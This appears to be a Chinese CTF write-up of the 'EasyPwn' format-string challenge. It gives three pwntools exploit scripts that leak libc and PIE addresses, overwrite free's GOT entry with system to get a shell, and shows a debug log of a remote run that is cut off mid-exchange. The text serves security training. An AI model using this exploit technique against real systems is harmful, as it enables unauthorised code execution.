攻防世界Easypwn-格式化字符串漏洞利用

20 篇文章 0 订阅

解题思路

基本信息查询

healer@healer:~/Documents/CTF/PWN/3.FormatStringVulnerability/EasyPwn$ readelf -h pwn1
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              DYN (Shared object file)
  Machine:                           Advanced Micro Devices X86-64
  Version:                           0x1
  Entry point address:               0xa00
  Start of program headers:          64 (bytes into file)
  Start of section headers:          8640 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         9
  Size of section headers:           64 (bytes)
  Number of section headers:         29
  Section header string table index: 28
healer@healer:~/Documents/CTF/PWN/3.FormatStringVulnerability/EasyPwn$ checksec pwn1
[*] '/home/healer/Documents/CTF/PWN/3.FormatStringVulnerability/EasyPwn/pwn1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

漏洞分析

通过初步的分析发现下面的函数存在漏洞在执行snprintf()函数的时候有格式化字符串漏洞,因为观察栈空间可以发现有重叠的部分,利用这个重叠制造格式化漏洞利用
并且通过劫持free函数的got表信息,使其指向system函数,最后使用程序的正常执行流程,输入“/bin/sh”执行另一个功能即可执行system("/bin/sh")

__int64 sub_B30()
{
  char s; // [sp+10h] [bp-BF0h]@1
  char v2; // [sp+410h] [bp-7F0h]@1
  __int64 v3; // [sp+7F8h] [bp-408h]@1
  __int64 v4; // [sp+BF8h] [bp-8h]@1

  v4 = *MK_FP(__FS__, 40LL);
  memset(&s, 0, 0x400uLL);
  memset(&v3, 0, 8uLL);
  memset(&v2, 0, 0x7E8uLL);
  LOWORD(v3) = 29477;
  BYTE2(v3) = 0;
  puts("Welcome To WHCTF2017:");
  read(0, &s, 0x438uLL);
  snprintf(&v2, 0x7D0uLL, (const char *)&v3, &s);
  printf("Your Input Is :%s\n", &v2);
  return *MK_FP(__FS__, 40LL) ^ v4;
}

漏洞利用脚本

此题的一些思考

这个题做的时候因为已经触发过free()函数,所以free函数的got表值已经写入了,并且和system函数的只相差最后三个字节,修改时可以逐个字节修改,也可以逐字修改,只不过逐字修改多一点,也可以第一次一个字,第二次一个字节,或者直接一次性修改四个字节,但是这个没有尝试成功

这个题因为开了动态地址随机化,所以每一次加载的位置都不一样并且获得的system函数的值也不一样,所以构造的格式化字符串的详细数值(控制写入的字符个数值)也是不一样的,指定的位置(指向目标地址的指针)在栈中的偏移是可以确定的,所以构造的格式化字符串要动态生成。并且要首先泄露进程的加载地址,以及函数的加载地址,需要通过前期泄露出来。

可能脚本中的方法略显笨拙,大佬勿喷,汗!!!

逐字节修改方法

from pwn import *
# from LibcSearcher import * 


context.log_level='debug'
context.terminal = ['terminator', '-x', 'sh', '-c']

io = remote("111.200.241.244",48509)

# io = process("./pwn1")
libc = ELF("./libc.so.6")
# libc = ELF("./libc-2.23.so")
elf = ELF("./pwn1")

context(arch = "amd64", os = 'linux')

io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
# gdb.attach(io,"b * 0x555555554c05")
payload = b"a"*0x3e8 + b"bb%397$p"
io.sendline(payload)

io.recvuntil("0x")
libc_start_main = io.recv(12)
libc_start_main = int(b"0x"+libc_start_main,16) - 240

log.info("libc_start_main: "+hex(libc_start_main))

libc_start_main_libc = libc.symbols["__libc_start_main"]
log.info("libc_start_main_libc: "+hex(libc_start_main_libc))
system_addr = libc.symbols["system"]
log.info("system_addr: "+hex(system_addr))
offset = libc_start_main_libc - system_addr
# 24C50
system_real_addr = libc_start_main - offset
log.info("system_real_addr: "+hex(system_real_addr))


# libc_searcher = LibcSearcher("__libc_start_main",libc_start_main)
# libc_base = libc_start_main - libc_searcher.dump("__libc_start_main")
# system = libc_base + libc_searcher.dump("system")
# system_real_addr = system
# log.info("system_real_addr: "+hex(system_real_addr))


io.recvuntil("Input Your Code:")
io.sendline("2")
io.recvuntil("Input Your Name:")
io.sendline("healer")

io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
payload = b"a"*0x3e8 + b"bb%396$p"
io.sendline(payload)

io.recvuntil("0x")
init_real_addr = io.recv(12)
init_real_addr = int(b"0x"+init_real_addr,16)
log.info("init_real_addr: "+hex(init_real_addr))

elf_base = 0xFFFFFFFFFFFFF000 & init_real_addr
free_got_addr = elf_base + 0x202018
log.info("free_got_addr: "+hex(free_got_addr))

# [*] system_real_addr: 0x7fc35da95fa0
# [*] system_real_addr: 0x7fef74ad8fa0


one_byte = 0x00000000000000FF & system_real_addr
two_byte = (0x000000000000FF00 & system_real_addr) >> 8
three_byte = (0x00000000FF0000 & system_real_addr) >> 16

one_offset = one_byte + 2
two_offset = two_byte + 2
three_offset = three_byte + 2

pattern_payload = (b"bb%" + str(one_offset).encode() + b"c%133$hhn").ljust(16,b"A")
# print(pattern_payload)

# print(one_offset,two_offset,three_offset)


io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
# payload = b"a"*0x3e8 + b"bb%135$p%136$p%137$p%138$p%139$p%140$p%141$p%142$p%143$p%144$p%145$p%146$p"
# payload = b"a"*0x3e0 + p64(free_got_addr) + b"bb%4154793912c%130$n" 
payload = b"a"*0x3e8 + (b"bb%" + str(one_offset).encode() + b"c%133$hhn").ljust(16,b"A") + p64(free_got_addr) 
# payload = b"a"*0x3e8 + b"bb%8118c%135$hn%5c%136$hhnAAAAAA" + p64(free_got_addr) + p64(free_got_addr+2)
io.sendline(payload)
# 0x00007ffff7a91540 -> 0x7ffff7a523a0
# bb%8118c%135$hn%5c%136$hhnAAAAAA
# payload = b"a"*0x3e8 + b"bb%8118c%135$hn%5c%136$hhnAAAAAA" + p64(free_got_addr) + p64(free_got_addr+2)
# 83:0418│      0x7fffffffd568 —▸ 0x555555756018 —▸ 0x7ffff7a91540 (free) ◂— push   r13
# 84:0420│      0x7fffffffd570 —▸ 0x55555575601a ◂— 0xc6a000007ffff7a9

# 0x7ffff7a59f59 <printf_positional+8697>    mov    word ptr [rax], r15w
# 0x7ffff7a590f7 <printf_positional+5015>    mov    byte ptr [rax], r15b
# 0x7ffff7a59bd6 <printf_positional+7798>    mov    dword ptr [rax], r15d
# 0x7fffffffbfe0 ◂— 0x60186e6868243233

io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
payload = b"a"*0x3e8 + (b"bb%" + str(two_offset).encode() + b"c%133$hhn").ljust(16,b"A") + p64(free_got_addr+1) 
io.sendline(payload)

io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
payload = b"a"*0x3e8 + (b"bb%" + str(three_offset).encode() + b"c%133$hhn").ljust(16,b"A") + p64(free_got_addr+2) 
io.sendline(payload)


io.recvuntil("Input Your Code:")
io.sendline("2")
io.recvuntil("Input Your Name:")
io.sendline("/bin/sh")


io.interactive()

一字加一字节方法写入脚本

此脚本用在本地关了地址随机化时的测试,本地调试成功的,方法都是一样的,再加上地址随机化的处理即可作为有效的exp

from pwn import *
context.log_level='debug'
context.terminal = ['terminator', '-x', 'sh', '-c']

# io = remote("220.249.52.134",59762)

io = process("./pwn1")
libc = ELF("./libc.so.6")
elf = ELF("./pwn1")

context(arch = "amd64", os = 'linux')

io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
gdb.attach(io,"b * 0x555555554c05")
payload = b"a"*0x3e8 + b"bb%397$p"
io.sendline(payload)

io.recvuntil("0x")
libc_start_main = io.recv(12)
libc_start_main = int(b"0x"+libc_start_main,16) - 240

log.info("libc_start_main: "+hex(libc_start_main))

libc_start_main_libc = libc.symbols["__libc_start_main"]
log.info("libc_start_main_libc: "+hex(libc_start_main_libc))
system_addr = libc.symbols["system"]
log.info("system_addr: "+hex(system_addr))
offset = libc_start_main_libc - system_addr
# 24C50
system_real_addr = libc_start_main - offset
log.info("system_real_addr: "+hex(system_real_addr))


io.recvuntil("Input Your Code:")
io.sendline("2")
io.recvuntil("Input Your Name:")
io.sendline("healer")

io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
payload = b"a"*0x3e8 + b"bb%396$p"
io.sendline(payload)

io.recvuntil("0x")
init_real_addr = io.recv(12)
init_real_addr = int(b"0x"+init_real_addr,16)
log.info("init_real_addr: "+hex(init_real_addr))

elf_base = 0xFFFFFFFFFFFFF000 & init_real_addr
free_got_addr = elf_base + 0x202018
log.info("free_got_addr: "+hex(free_got_addr))




io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
# payload = b"a"*0x3e8 + b"bb%135$p%136$p%137$p%138$p%139$p%140$p%141$p%142$p%143$p%144$p%145$p%146$p"
# payload = b"a"*0x3e0 + p64(free_got_addr) + b"bb%4154793912c%130$n" 
payload = b"a"*0x3e8 + b"bb%8098c%133$hnA" + p64(free_got_addr) 
# payload = b"a"*0x3e8 + b"bb%8118c%135$hn%5c%136$hhnAAAAAA" + p64(free_got_addr) + p64(free_got_addr+2)
io.sendline(payload)
# 0x00007ffff7a91540 -> 0x7ffff7a523a0
# bb%8118c%135$hn%5c%136$hhnAAAAAA
# payload = b"a"*0x3e8 + b"bb%8118c%135$hn%5c%136$hhnAAAAAA" + p64(free_got_addr) + p64(free_got_addr+2)
# 83:0418│      0x7fffffffd568 —▸ 0x555555756018 —▸ 0x7ffff7a91540 (free) ◂— push   r13
# 84:0420│      0x7fffffffd570 —▸ 0x55555575601a ◂— 0xc6a000007ffff7a9

# 0x7ffff7a59f59 <printf_positional+8697>    mov    word ptr [rax], r15w
# 0x7ffff7a590f7 <printf_positional+5015>    mov    byte ptr [rax], r15b
# 0x7ffff7a59bd6 <printf_positional+7798>    mov    dword ptr [rax], r15d
# 0x7fffffffbfe0 ◂— 0x60186e6868243233

io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
payload = b"a"*0x3e8 + b"bb%167c%133$hhnA" + p64(free_got_addr+2) 
io.sendline(payload)


io.recvuntil("Input Your Code:")
io.sendline("2")
io.recvuntil("Input Your Name:")
io.sendline("/bin/sh")




io.interactive()

直接写入双字脚本

这个方法没有尝试成功,具体写入目标地址的时候发生下面内容中的错误,不想再细看了,先放着吧,估计是一次写的太大了,此方法未尝试成功

from pwn import *
context.log_level='debug'
context.terminal = ['terminator', '-x', 'sh', '-c']

# io = remote("220.249.52.134",59762)

io = process("./pwn1")
libc = ELF("./libc.so.6")
elf = ELF("./pwn1")

context(arch = "amd64", os = 'linux')

io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
gdb.attach(io,"b * 0x555555554c05")
payload = b"a"*0x3e8 + b"bb%397$p"
io.sendline(payload)

io.recvuntil("0x")
libc_start_main = io.recv(12)
libc_start_main = int(b"0x"+libc_start_main,16) - 240

log.info("libc_start_main: "+hex(libc_start_main))

libc_start_main_libc = libc.symbols["__libc_start_main"]
log.info("libc_start_main_libc: "+hex(libc_start_main_libc))
system_addr = libc.symbols["system"]
log.info("system_addr: "+hex(system_addr))
offset = libc_start_main_libc - system_addr
# 24C50
system_real_addr = libc_start_main - offset
log.info("system_real_addr: "+hex(system_real_addr))


io.recvuntil("Input Your Code:")
io.sendline("2")
io.recvuntil("Input Your Name:")
io.sendline("healer")

io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
payload = b"a"*0x3e8 + b"bb%396$p"
io.sendline(payload)

io.recvuntil("0x")
init_real_addr = io.recv(12)
init_real_addr = int(b"0x"+init_real_addr,16)
log.info("init_real_addr: "+hex(init_real_addr))

elf_base = 0xFFFFFFFFFFFFF000 & init_real_addr
free_got_addr = elf_base + 0x202018
log.info("free_got_addr: "+hex(free_got_addr))




io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
# payload = b"a"*0x3e8 + b"bb%135$p%136$p%137$p%138$p%139$p%140$p%141$p%142$p%143$p%144$p%145$p%146$p"
# payload = b"a"*0x3e0 + p64(free_got_addr) + b"bb%4154793912c%130$n" 
payload = b"a"*0x3e8 + b"bb%128263072c%134$nAAAA" + p64(free_got_addr) 
# payload = b"a"*0x3e8 + b"bb%8118c%135$hn%5c%136$hhnAAAAAA" + p64(free_got_addr) + p64(free_got_addr+2)
io.sendline(payload)
# 0x00007ffff7a91540 -> 0x7ffff7a523a0
# bb%8118c%135$hn%5c%136$hhnAAAAAA
# payload = b"a"*0x3e8 + b"bb%8118c%135$hn%5c%136$hhnAAAAAA" + p64(free_got_addr) + p64(free_got_addr+2)
# 83:0418│      0x7fffffffd568 —▸ 0x555555756018 —▸ 0x7ffff7a91540 (free) ◂— push   r13
# 84:0420│      0x7fffffffd570 —▸ 0x55555575601a ◂— 0xc6a000007ffff7a9

# 0x7ffff7a59f59 <printf_positional+8697>    mov    word ptr [rax], r15w
# 0x7ffff7a590f7 <printf_positional+5015>    mov    byte ptr [rax], r15b
# 0x7ffff7a59bd6 <printf_positional+7798>    mov    dword ptr [rax], r15d
# 0x7fffffffbfe0 ◂— 0x60186e6868243233


io.recvuntil("Input Your Code:")
io.sendline("2")
io.recvuntil("Input Your Name:")
io.sendline("/bin/sh")

io.interactive()

'''
pwndbg> watch * 0x555555756018
Hardware watchpoint 2: * 0x555555756018
pwndbg> c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7a59bd6 in printf_positional (s=s@entry=0x7fffffffcf10, format=format@entry=0x7fffffffd948 "bb%128263072c%134$nAAAA\030", ' ' <repeats 176 times>..., readonly_format=readonly_format@entry=0, ap=ap@entry=0x7fffffffd078, ap_savep=ap_savep@entry=0x7fffffffcaa8, done=128264096, nspecs_done=2, lead_str_end=0x7fffffffd948 "bb%128263072c%134$nAAAA\030", ' ' <repeats 176 times>..., work_buffer=0x7fffffffcae0 "x\320\377\377\377\177", save_errno=0, grouping=0x0, thousands_sep=0x7ffff7b99be5 "") at vfprintf.c:2022
2022    vfprintf.c: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────[ REGISTERS ]──────────────────────────────────
*RAX  0x6161616161616161 ('aaaaaaaa')
*RBX  0x7fffffffb780 ◂— 0xffffd160
*RCX  0x0
*RDX  0x17
*RDI  0x7ffff7a58bd0 (printf_positional+3696) ◂— mov    rsi, qword ptr [r14 + 0x38]
*RSI  0x20
*R8   0x0
*R9   0x6e
*R10  0x6e
*R11  0x0
*R12  0x0
*R13  0x7fffffffcf10 ◂— 0xfbad8001
*R14  0x7fffffffc5b0 ◂— 0xffffffff
*R15  0x7a527a0
*RBP  0x7fffffffc950 —▸ 0x7fffffffcf00 —▸ 0x7fffffffd560 ◂— 0x6161616161616161 ('aaaaaaaa')
*RSP  0x7fffffffb780 ◂— 0xffffd160
*RIP  0x7ffff7a59bd6 (printf_positional+7798) ◂— mov    dword ptr [rax], r15d
────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────
 ► 0x7ffff7a59bd6 <printf_positional+7798>    mov    dword ptr [rax], r15d
   0x7ffff7a59bd9 <printf_positional+7801>    jmp    printf_positional+1666 <printf_positional+1666>
    ↓
   0x7ffff7a583e2 <printf_positional+1666>    mov    rax, qword ptr [rbp - 0x478]
   0x7ffff7a583e9 <printf_positional+1673>    test   rax, rax
   0x7ffff7a583ec <printf_positional+1676>    je     printf_positional+1686 <printf_positional+1686>
    ↓
   0x7ffff7a583f6 <printf_positional+1686>    test   r15d, r15d
   0x7ffff7a583f9 <printf_positional+1689>    js     printf_positional+9059 <printf_positional+9059>
    ↓
   0x7ffff7a5a0c3 <printf_positional+9059>    lea    rcx, [rip + 0x146816] <0x7ffff7ba08e0>
   0x7ffff7a5a0ca <printf_positional+9066>    lea    rsi, [rip + 0x13fdcb]
   0x7ffff7a5a0d1 <printf_positional+9073>    lea    rdi, [rip + 0x143740]
   0x7ffff7a5a0d8 <printf_positional+9080>    mov    edx, 0x80e
─────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────
00:0000│ rbx rsp  0x7fffffffb780 ◂— 0xffffd160
01:0008│          0x7fffffffb788 ◂— 0x0
02:0010│          0x7fffffffb790 —▸ 0x7ffff7fde700 ◂— 0x7ffff7fde700
03:0018│          0x7fffffffb798 ◂— 0x0
04:0020│          0x7fffffffb7a0 ◂— 0x555599999999
05:0028│          0x7fffffffb7a8 ◂— 0x0
... ↓
───────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────
 ► f 0     7ffff7a59bd6 printf_positional+7798
   f 1     7ffff7a5a4b6 vfprintf+822
   f 2     7ffff7a83a59 vsnprintf+121
   f 3     7ffff7a62942 snprintf+130
   f 4     555555554c0a
   f 5     555555554cf9
   f 6     7ffff7a2d840 __libc_start_main+240
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> 

'''

脚本执行结果

healer@healer-virtual-machine:~/Desktop/EasyPwn$ python3 exp.py 
[+] Opening connection to 111.200.241.244 on port 48509: Done
[DEBUG] PLT 0x1f7f0 realloc
[DEBUG] PLT 0x1f800 __tls_get_addr
[DEBUG] PLT 0x1f820 memalign
[DEBUG] PLT 0x1f850 _dl_find_dso_for_object
[DEBUG] PLT 0x1f870 calloc
[DEBUG] PLT 0x1f8a0 malloc
[DEBUG] PLT 0x1f8a8 free
[*] '/home/healer/Desktop/EasyPwn/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[DEBUG] PLT 0x920 free
[DEBUG] PLT 0x930 puts
[DEBUG] PLT 0x940 write
[DEBUG] PLT 0x950 __stack_chk_fail
[DEBUG] PLT 0x960 printf
[DEBUG] PLT 0x970 snprintf
[DEBUG] PLT 0x980 memset
[DEBUG] PLT 0x990 read
[DEBUG] PLT 0x9a0 __libc_start_main
[DEBUG] PLT 0x9b0 malloc
[DEBUG] PLT 0x9c0 setvbuf
[DEBUG] PLT 0x9d0 atoi
[DEBUG] PLT 0x9e0 __isoc99_scanf
[DEBUG] PLT 0x9f0 __gmon_start__
[DEBUG] PLT 0x9f8 __cxa_finalize
[*] '/home/healer/Desktop/EasyPwn/pwn1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[DEBUG] Received 0x11 bytes:
    b'Input Your Code:\n'
[DEBUG] Sent 0x2 bytes:
    b'1\n'
[DEBUG] Received 0x15 bytes:
    b'Welcome To WHCTF2017:'
[DEBUG] Sent 0x3f1 bytes:
    b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabb%397$p\n'
[DEBUG] Received 0x1 bytes:
    b'\n'
[DEBUG] Received 0x421 bytes:
    b'Your Input Is :aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabb%397$p\n'
    b'0x7fbf673df830\n'
    b'\n'
    b'Input Your Code:\n'
[*] libc_start_main: 0x7fbf673df740
[*] libc_start_main_libc: 0x20740
[*] system_addr: 0x45390
[*] system_real_addr: 0x7fbf67404390
[DEBUG] Sent 0x2 bytes:
    b'2\n'
[DEBUG] Received 0x11 bytes:
    b'Input Your Name:\n'
[DEBUG] Sent 0x7 bytes:
    b'healer\n'
[DEBUG] Received 0x20 bytes:
    b'OK!I Know Your Name :healer\n'
    b'Now!'
[DEBUG] Received 0x11 bytes:
    b'Input Your Code:\n'
[DEBUG] Sent 0x2 bytes:
    b'1\n'
[DEBUG] Received 0x15 bytes:
    b'Welcome To WHCTF2017:'
[DEBUG] Sent 0x3f1 bytes:
    b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabb%396$p\n'
[DEBUG] Received 0x1 bytes:
    b'\n'
[DEBUG] Received 0x421 bytes:
    b'Your Input Is :aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabb%396$p\n'
    b'0x55e0a5c1ada0\n'
    b'\n'
    b'Input Your Code:\n'
[*] init_real_addr: 0x55e0a5c1ada0
[*] free_got_addr: 0x55e0a5e1c018
b'bb%146c%133$hhnA'
146 69 66
[DEBUG] Sent 0x2 bytes:
    b'1\n'
[DEBUG] Received 0x15 bytes:
    b'Welcome To WHCTF2017:'
[DEBUG] Sent 0x401 bytes:
    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    000003e0  61 61 61 61  61 61 61 61  62 62 25 31  34 36 63 25  │aaaa│aaaa│bb%1│46c%│
    000003f0  31 33 33 24  68 68 6e 41  18 c0 e1 a5  e0 55 00 00  │133$│hhnA│····│·U··│
    00000400  0a                                                  │·│
    00000401
[DEBUG] Received 0x1 bytes:
    b'\n'
[DEBUG] Received 0x4a4 bytes:
    00000000  59 6f 75 72  20 49 6e 70  75 74 20 49  73 20 3a 61  │Your│ Inp│ut I│s :a│
    00000010  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    000003f0  61 61 61 61  61 61 61 62  62 25 31 34  36 63 25 31  │aaaa│aaab│b%14│6c%1│
    00000400  33 33 24 68  68 6e 41 18  c0 e1 a5 e0  55 20 20 20  │33$h│hnA·│····│U   │
    00000410  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  │    │    │    │    │
    *
    00000490  20 20 20 20  20 20 20 20  20 20 20 20  20 20 0a 49  │    │    │    │  ·I│
    000004a0  6e 70 75 74                                         │nput│
    000004a4
[DEBUG] Received 0xc bytes:
    b' Your Code:\n'
[DEBUG] Sent 0x2 bytes:
    b'1\n'
[DEBUG] Received 0x15 bytes:
    b'Welcome To WHCTF2017:'
[DEBUG] Sent 0x401 bytes:
